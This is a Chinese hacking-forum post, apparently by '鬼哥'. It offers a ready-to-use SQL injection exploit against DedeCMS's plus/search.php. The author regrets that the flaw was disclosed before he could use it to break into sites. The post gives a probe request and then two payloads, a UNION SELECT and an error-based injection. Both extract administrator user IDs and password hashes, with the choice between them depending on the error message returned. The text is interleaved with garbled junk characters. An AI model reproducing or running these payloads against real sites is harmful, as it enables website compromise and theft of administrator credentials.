转载不加作者名的没JJ
" z+ B1 M( b, q% M& U
$ g* `5 G5 w2 H哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站 放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。
% T* d; r& m& K8 q
3 ]0 L& E) ]0 f- j+ {5 J既然已经发出来了,我就把我自己搞的exp发下吧。。唉。
0 K; T3 J! x* @( }: k6 }- A. y% H8 d" y9 W
我一般是这样测试的:8 s! L2 N4 T5 L* F. ?
, h* h4 t/ ~0 J8 J- b, T. i
提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a$ W2 M1 {- p8 C7 M. T. N4 J
- z: i1 k$ l! P3 v) N转载不加作者名的没JJ9 h- @" E8 B* z+ E
! }2 T/ [; [' |+ L3 p9 \$ `
作者:鬼哥
' u( Q9 r* V0 Z( R2 l
: O) x# _ ]: g. n/ s3 K
( j' L) F" V0 |1 A
/ x9 a% h/ w; @看结果如果提示/ l! i) t, G5 b
* y$ E# X! g" ?3 ^. a' }3 S; nSafe Alert: Request Error step 2 !6 _+ K# _' N, A! M3 B3 V
* Y( y5 F) O/ N, y9 q0 r
那么直接用下面的exp
3 j( N; J3 L4 y; ~! c* w3 j8 e7 a+ x2 h- r
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a
# v) f A. D9 }1 H) \- H
/ b4 ` I; D+ o& m8 ~/ w4 v8 I( D7 \
! H. C) a2 m5 o4 ]- R看结果如果提示+ t( J' e9 o* q
: }, t" @% M* J: \- U$ V5 t+ @3 @3 W
Safe Alert: Request Error step 1 !
( C4 o3 B) X/ A4 Z! f) q
% K* _+ n" x7 U2 t那么直接用下面的exp
, K+ [ e2 V" r1 Z( [$ z
* b: |$ _' j' Rxx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a# W* [7 _1 m$ c8 G. @ |+ r
, Z7 | ^% Y9 D T4 A" E
" S* R- ~2 e: G3 U% e如果正常显示证明漏洞不存在了。
1 G) o Y& v5 ?& b5 O+ j( [/ B
9 l+ v6 L" g7 O) W+ G转载不加作者名的没JJ |